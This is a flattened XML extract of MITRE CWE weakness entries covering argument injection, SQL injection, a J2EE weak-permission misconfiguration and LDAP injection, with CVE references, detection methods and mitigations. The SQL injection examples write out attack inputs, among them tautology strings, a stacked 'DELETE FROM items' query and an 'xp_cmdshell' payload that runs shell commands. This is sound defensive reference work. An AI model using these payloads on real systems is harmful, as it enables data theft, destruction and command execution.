Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2057 - - - CVE-2006-2058 - Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2058 - - - CVE-2006-2312 - Argument injection vulnerability in the URI handler in Skype 2.0.*.104 and 2.5.*.0 through 2.5.*.78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2312 - - - CVE-2006-3015 - Argument injection vulnerability in WinSCP 3.8.1 build 328 allows remote attackers to upload or download arbitrary files via encoded spaces and double-quote characters in a scp or sftp URI. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3015 - - - CVE-2006-4692 - Argument injection vulnerability in the Windows Object Packager (packager.exe) in Microsoft Windows XP SP1 and SP2 and Server 2003 SP1 and earlier allows remote user-assisted attackers to execute arbitrary commands via a crafted file with a "/" (slash) character in the filename of the Command Line property, followed by a valid file extension, which causes the command before the slash to be executed, aka "Object Packager Dialogue Spoofing Vulnerability." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4692 - - - CVE-2006-6597 - Argument injection vulnerability in HyperAccess 8.4 allows user-assisted remote attackers to execute arbitrary vbscript and commands via the /r option in a telnet:// URI, which is configured to use hawin32.exe. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6597 - - - CVE-2007-0882 - Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882 - - - CVE-2001-1246 - Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1246 - - - CVE-2019-13475 - Argument injection allows execution of arbitrary commands by injecting a "-exec" option, which is executed by the command. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13475 - - - - System Process - - - - Argument Injection or Modification - - - ENV03-C - Sanitize the environment when invoking external programs - - - ENV33-C - Do not call system() - Imprecise - - - STR02-C - Sanitize data passed to complex subsystems - - - 30 - Mail Command Injection - - - - - - - - - - - - - - - - At one layer of abstraction, this can overlap other weaknesses that have whitespace problems, e.g. injection of javascript into attributes of HTML tags. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Potential_Mitigations, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Description, Name, References, Relationships - - - CWE Content Team - MITRE - 2019-09-23 - updated Description, Name, Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - Argument Injection or Modification - Improper Delimitation of Arguments in a Command ('Argument Injection') - - - - The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. - - Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands. - SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes. - - - - - - - - - - - - Architecture and Design - This weakness typically appears in data-rich applications that save user inputs in a database. - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Read Application Data - Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities. - - - Access Control - Bypass Protection Mechanism - If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password. - - - Access Control - Bypass Protection Mechanism - If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability. - - - Integrity - Modify Application Data - Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack. - - - - - Automated Static Analysis - - This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. - Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes. - Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis. - - This is not a perfect solution, since 100% accuracy and coverage are not feasible. - - - Automated Dynamic Analysis - This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. - Moderate - - - Manual Analysis - Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Database Scanners - - - Cost effective for partial coverage: - - - Web Application Scanner - Web Services Scanner - - - - - High - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Fuzz Tester - Framework-based Fuzzer - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - High - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - - - - - High - - - - - Architecture and Design - Libraries or Frameworks - - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly. - - - - Architecture and Design - Parameterization - - If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. - Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using "exec" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867] - - - - Architecture and Design - Operation - Environment Hardening - - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Implementation - Output Encoding - - While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). - Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the mysql_real_escape_string() API function is available in both C and PHP. - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. - Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name "O'Reilly" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the "'" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded. - When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes. - - - - Architecture and Design - Enforcement by Conversion - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - - - Implementation - - Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. - If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. - Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. - In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings. - - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - - - In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code. - - - The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user. - - ...string userName = ctx.getAuthenticatedUserName();string query = "SELECT * FROM items WHERE owner = '" + userName + "' AND itemname = '" + ItemName.Text + "'";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);... - - The query that this code intends to execute follows: - - SELECT * FROM items WHERE owner = <userName> AND itemname = <itemName>; - - However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string: - - name' OR 'a'='a - - for itemName, then the query becomes the following: - - SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name' OR 'a'='a'; - - The addition of the: - - OR 'a'='a - - condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query: - - SELECT * FROM items; - - This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner. - - - This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example. - If an attacker with the user name wiley enters the string: - - name'; DELETE FROM items; -- - - for itemName, then the query becomes the following two queries: - - SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';DELETE FROM items; - --' - - - - Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database. - Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example. - If an attacker enters the string - - name'; DELETE FROM items; SELECT * FROM items WHERE 'a'='a - - Then the following three valid statements will be created: - - SELECT * FROM items WHERE owner = 'wiley' AND itemname = 'name';DELETE FROM items;SELECT * FROM items WHERE 'a'='a'; - - One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can: - - - - Target fields that are not quoted - - - Find ways to bypass the need for certain escaped meta-characters - - - Use stored procedures to hide the injected meta-characters. - - - - Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks. - Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example. - - procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)is open itm_cv for' SELECT * FROM items WHERE ' || 'owner = '|| usr || ' AND itemname = ' || itm || ';end get_item; - - Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks. - - - MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form: - - SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY='$user_input' ORDER BY PRICE - - Where $user_input is taken from an untrusted source. - If the user provides the string: - - '; exec master..xp_cmdshell 'dir' -- - - The query will take the following form: - - SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; exec master..xp_cmdshell 'dir' --' ORDER BY PRICE - - Now, this query can be broken down into: - - - - a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=''; - - - a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell 'dir' - - - an MS SQL comment: --' ORDER BY PRICE - - - - As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment. - - - This code intends to print a message summary given the message ID. - - $id = $_COOKIE["mid"];mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); - - The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser. - While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to: - - 1432' or '1' = '1 - - This would produce the resulting query: - - SELECT MessageID, Subject FROM messages WHERE MessageID = '1432' or '1' = '1' - - Not only will this retrieve message number 1432, it will retrieve all other messages. - In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection: - - $id = intval($_COOKIE["mid"]);mysql_query("SELECT MessageID, Subject FROM messages WHERE MessageID = '$id'"); - - However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message. - - - This example attempts to take a last name provided by a user and enter it into a database. - - $userKey = getUserID();$name = getUserInput(); - - # ensure only letters, hyphens and apostrophe are allowed - $name = allowList($name, "^a-zA-z'-$");$query = "INSERT INTO last_names VALUES('$userKey', '$name')"; - - While the programmer applies a allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies "--" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations. - - - - - CVE-2004-0366 - chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0366 - - - CVE-2008-2790 - SQL injection through an ID that was supposed to be numeric. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2790 - - - CVE-2008-2223 - SQL injection through an ID that was supposed to be numeric. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223 - - - CVE-2007-6602 - SQL injection via user name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6602 - - - CVE-2008-5817 - SQL injection via user name or password fields. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5817 - - - CVE-2003-0377 - SQL injection in security product, using a crafted group name. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0377 - - - CVE-2008-2380 - SQL injection in authentication library. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2380 - - - CVE-2017-11508 - SQL injection in vulnerability management and reporting tool, using a crafted password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11508 - - - - - SQL injection - - - SQL Injection - - - SQL injection - - - A2 - Injection Flaws - CWE More Specific - - - A1 - Unvalidated Input - CWE More Specific - - - A6 - Injection Flaws - CWE More Specific - - - 19 - SQL Injection - - - SFP24 - Tainted input to command - - - ASCSM-CWE-89 - - - IDS00-J - Prevent SQL injection - Exact - - - - - - - - - - - - - - - - - - - - - - - - - - - - - SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-01-12 - updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Name, Related_Attack_Patterns - - - KDM Analytics - 2009-07-17 - Improved the White_Box_Definition - - - CWE Content Team - MITRE - 2009-07-27 - updated Description, Name, White_Box_Definitions - - - CWE Content Team - MITRE - 2009-12-28 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Name, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References - - - CWE Content Team - MITRE - 2012-05-11 - updated Potential_Mitigations, References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, Observed_Examples, References, Relationships, White_Box_Definitions - - - CWE Content Team - MITRE - 2018-03-27 - updated References, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations, Relationship_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - SQL Injection - Failure to Sanitize Data into SQL Queries (aka 'SQL Injection') - Failure to Sanitize Data within SQL Queries (aka 'SQL Injection') - Failure to Preserve SQL Query Structure (aka 'SQL Injection') - Failure to Preserve SQL Query Structure ('SQL Injection') - Improper Sanitization of Special Elements used in an SQL Command ('SQL Injection') - - - - If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system. - If the EJB deployment descriptor contains one or more method permissions that grant access to the special ANYONE role, it indicates that access control for the application has not been fully thought through or that the application is structured in such a way that reasonable access control restrictions are impossible. - - - - - - Architecture and Design - - - Implementation - - - - - Other - Other - - - - - Architecture and Design - System Configuration - Follow the principle of least privilege when assigning access rights to EJB methods. Permission to invoke EJB methods should not be granted to the ANYONE role. - - - - - The following deployment descriptor grants ANYONE permission to invoke the Employee EJB's method named getSalary(). - - <ejb-jar>...<assembly-descriptor><method-permission><role-name>ANYONE</role-name><method><ejb-name>Employee</ejb-name><method-name>getSalary</method-name></method-permission></assembly-descriptor>...</ejb-jar> - - - - - - J2EE Misconfiguration: Weak Access Permissions - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Misconfiguration: Weak Access Permissions - - - - The software constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component. - - - - - - - - - - Architecture and Design - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - Read Application Data - Modify Application Data - An attacker could include input that changes the LDAP query which allows unintended commands or code to be executed, allows sensitive data to be read or modified or causes other unintended behavior. - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - - - The code below constructs an LDAP query using user input address data: - - context = new InitialDirContext(env);String searchFilter = "StreetAddress=" + address;NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls); - - Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries. - - - - - CVE-2005-2301 - Server does not properly escape LDAP queries, which allows remote attackers to cause a DoS and possibly conduct an LDAP injection attack. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2301 - - - - - LDAP injection - - - A2 - Injection Flaws - CWE More Specific - - - 29 - LDAP Injection - - - SFP24 - Tainted input to command - - - - - - - - - - Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors. - Under-reported. This is likely found very frequently by third party code auditors, but there are very few publicly reported examples. - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations, Relationship_Notes - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - LDAP Injection - Failure to Sanitize Data into LDAP Queries (aka 'LDAP Injection') - Failure to Sanitize Data into LDAP Queries ('LDAP Injection') - - - - 